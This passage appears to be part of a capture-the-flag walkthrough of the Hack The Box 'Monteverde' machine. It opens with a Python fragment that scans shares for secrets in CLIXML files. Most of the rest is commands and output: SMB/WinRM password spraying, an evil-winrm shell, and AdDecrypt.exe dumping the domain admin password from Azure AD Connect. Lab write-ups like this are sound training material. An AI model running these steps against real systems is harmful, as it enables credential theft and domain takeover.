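def scan_tree(root_dir) -> list:
    """Walk a directory (e.g. a mounted users$ share) for CLIXML files."""
    results = []
    for path in Path(root_dir).rglob("*.xml"):
        try:
            text = decode_clixml(path.read_bytes())
            if PS_NS not in text[:512]:
                continue                      # not CLIXML, skip cheaply
            for hit in find_secrets(text):
                results.append({"file": str(path), **hit})
        except (ET.ParseError, OSError):
            continue
    return results


if __name__ == "__main__":
    for hit in find_secrets(decode_clixml(SAMPLE_CLIXML)):
        print(hit)
```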
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ ls
azure.xml mantis.gnmap mantis.xml Monteverde.nmap users2.txt users4.txt
kerbrute mantis.nmap Monteverde.gnmap Monteverde.xml users3.txt users.txt
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ nano users.txt
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ crackmapexec smb 10.10.10.179 -u users.txt -p '4n0therD4y@n0th3r$'
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ crackmapexec smb 10.10.10.172 -u users.txt -p '4n0therD4y@n0th3r$'
SMB 10.10.10.172 445 MONTEVERDE [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\SABatchJobs:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\administrator:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$
The credentials also work over WinRM, so we get a shell with evil-winrm.
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ crackmapexec winrm 10.10.10.172 -u mhope -p '4n0therD4y@n0th3r$'
SMB 10.10.10.172 5985 MONTEVERDE [*] Windows 10.0 Build 17763 (name:MONTEVERDE) (domain:MEGABANK.LOCAL)
HTTP 10.10.10.172 5985 MONTEVERDE [*] http://10.10.10.172:5985/wsman
WINRM 10.10.10.172 5985 MONTEVERDE [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$ (Pwn3d!)
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ evil-winrm -i 10.10.10.172 -u mhope -p '4n0therD4y@n0th3r$'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mhope\Documents> cd ../
*Evil-WinRM* PS C:\Users\mhope> cd Desktop
*Evil-WinRM* PS C:\Users\mhope\Desktop> cat user.txt
bfec682a8877066eb64829042af046a4
*Evil-WinRM* PS C:\Users\mhope\Desktop>
Priv escalation
download and run winpeas
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ evil-winrm -i 10.10.10.172 -u mhope -p '4n0therD4y@n0th3r$'
winPEAS suggested looking at the file "RoamingCredentialSettings.xml", so I downloaded it.
*Evil-WinRM* PS C:\users\all users\Microsoft\uEV\InboxTemplates> get RoamingCredentialSettings.xml
The term 'get' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ get RoamingCredentialSettings.xml
+ ~~~
+ CategoryInfo : ObjectNotFound: (get:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\users\all users\Microsoft\uEV\InboxTemplates> download RoamingCredentialSettings.xml
Info: Downloading C:\users\all users\Microsoft\uEV\InboxTemplates\RoamingCredentialSettings.xml to RoamingCredentialSettings.xml
Info: Download successful!
*Evil-WinRM* PS C:\users\all users\Microsoft\uEV\InboxTemplates>
Nothing much in that file.
└─$ cat RoamingCredentialSettings.xml
<?xml version="1.0" encoding="utf-8"?>
<!--
Modifying the settings location templates for an application or a
Windows setting group provided with Microsoft User Experience Virtualization
may cause synchronization for the modified settings to fail.
For more information about settings location templates please see
the UE-V product documentation. http://go.microsoft.com/fwlink/?LinkId=260889
-->
<SettingsLocationTemplate xmlns='http://schemas.microsoft.com/UserExperienceVirtualization/2013/SettingsLocationTemplate'>
<!-- Roaming Credential settings -->
<Name>Roaming Credential Settings</Name>
<ID>RoamingCredentialSettings</ID>
<LocalizedNames>
<Name Locale='en-us'>Roaming Credential Settings</Name>
<Name Locale='cs-cz'>Nastavení cestovních přihlašovacích údajů</Name>
<Name Locale='da-dk'>Indstillinger for roaminglegitimationsoplysninger</Name>
<Name Locale='de-de'>Einstellungen für servergespeicherte Anmeldeinformationen</Name>
<Name Locale='el-gr'>Ρυθμίσεις διαπιστευτηρίων περιαγωγής</Name>
<Name Locale='es-es'>Configuración de credenciales móviles</Name>
<Name Locale='fi-fi'>Verkkovierailutunnistetietojen asetukset</Name>
<Name Locale='fr-fr'>Paramètres d’informations d’identification itinerants</Name>
<Name Locale='hu-hu'>Hordozható hitelesítőadat-beállítások</Name>
<Name Locale='it-it'>Impostazioni per le credenziali di roaming</Name>
<Name Locale='ja-jp'>移動資格情報の設定</Name>
<Name Locale='ko-kr'>로밍 자격 증명 설정</Name>
<Name Locale='nb-no'>Innstillinger for sentrallegitimasjon</Name>
<Name Locale='nl-nl'>Referentie-instellingen voor roaming</Name>
<Name Locale='pl-pl'>Ustawienia poświadczeń mobilnych</Name>
<Name Locale='pt-br'>Configurações de Credenciais de Roaming</Name>
<Name Locale='pt-pt'>Definições de Credencial de Roaming</Name>
<Name Locale='ru-ru'>Параметры перемещаемых учетных данных</Name>
<Name Locale='sk-sk'>Nastavenia zdieľania poverení</Name>
<Name Locale='sl-si'>Nastavitve poverilnic za gostovanje</Name>
<Name Locale='sv-se'>Autentiseringsinställningar för nätverksväxling</Name>
<Name Locale='tr-tr'>Dolaşım Kimlik Bilgileri Ayarları</Name>
<Name Locale='zh-cn'>漫游凭据设置</Name>
<Name Locale='zh-tw'>漫遊認證設定</Name>
</LocalizedNames>
<Version>0</Version>
<DeferToMSAccount/>
<Processes>
<ShellProcess/>
</Processes>
<Settings>
<File>
<Root>
<EnvironmentVariable>USERPROFILE</EnvironmentVariable>
</Root>
<Path Recursive="true">AppData\Roaming\Microsoft\Credentials</Path>
</File>
<File>
<Root>
<EnvironmentVariable>USERPROFILE</EnvironmentVariable>
</Root>
<Path Recursive="true">AppData\Roaming\Microsoft\Crypto</Path>
</File>
<File>
<Root>
<EnvironmentVariable>USERPROFILE</EnvironmentVariable>
</Root>
<Path Recursive="true">AppData\Roaming\Microsoft\Protect</Path>
</File>
<File>
<Root>
<EnvironmentVariable>USERPROFILE</EnvironmentVariable>
</Root>
<Path Recursive="true">AppData\Roaming\Microsoft\SystemCertificates</Path>
</File>
</Settings>
</SettingsLocationTemplate>
┌──(kali㉿kali)-[~/HTB/Monteverde]
The AAD_ account description seen earlier shows Azure AD Connect is installed on this box, and this Azure AD Connect database exploit is available for privesc:
Link: https://vbscrub.com/2020/01/14/azure-ad-connect-database-exploit-priv-esc/
Command to run:
AdDecrypt.exe -FullSQL
This program must be run while the AD Sync Bin folder is your "working directory", or has been added to the PATH variable. An easy way to do this is simply navigate to the folder in Powershell or Command Prompt (i.e. cd "C:\Program Files\Microsoft Azure AD Sync\Bin"), and then run the program by typing the full path to wherever you have stored it. You also need to make sure the mcrypt.dll from the download link is in the same directory the program is in. Failure to do either of these things will result in a Module Not Found error.
*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> C:\Users\mhope\Documents\ADdecrypt\AdDecrypt.exe -FullSQL
======================
AZURE AD SYNC CREDENTIAL DECRYPTION TOOL
Based on original code from: https://github.com/fox-it/adconnectdump
======================
Opening database connection...
Executing SQL commands...
Closing database connection...
Decrypting XML...
Parsing XML...
Finished!
DECRYPTED CREDENTIALS:
Username: administrator
Password: d0m@in4dminyeah!
Domain: MEGABANK.LOCAL
*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin>
Trying evil-winrm with the administrator credentials.
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ evil-winrm -i 10.10.10.172 -u administrator -p d0m@in4dminyeah!
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
f77447ffe7a3e4cb40da45e8d46202ec
*Evil-WinRM* PS C:\Users\Administrator\Desktop>